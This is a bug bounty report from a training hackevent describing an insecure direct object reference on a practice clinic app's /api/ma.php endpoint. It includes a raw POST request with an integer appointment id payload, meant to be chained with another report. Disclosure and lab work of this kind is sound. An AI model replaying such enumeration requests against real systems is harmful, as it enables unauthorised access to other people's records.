FirstBlood-#129 — IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel
This issue was discovered on FirstBlood v1
On 2021-05-10, jpdev Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary
Using the aptid paramater found on manageappointment.php, you can use this in place of the id parameter this will ONLY confirm that the numerical id is valid and returns a success message. It does not cancel the appointment. If you do not have access to the drpanel you can you use this bug in a bug chain to amend the messages on the appointment see report 127.
Example of its use in a chain:
Use the below to confirm the id is valid, with the id perform the attack referenced in report id = 127 https://www.bugbountyhunter.com/hackevents/report?id=127
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10
act=cancel&aptid=56911904
P2 High
Endpoint: POST /api/ma.php
Parameter: aptid=
Payload: 56911904
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.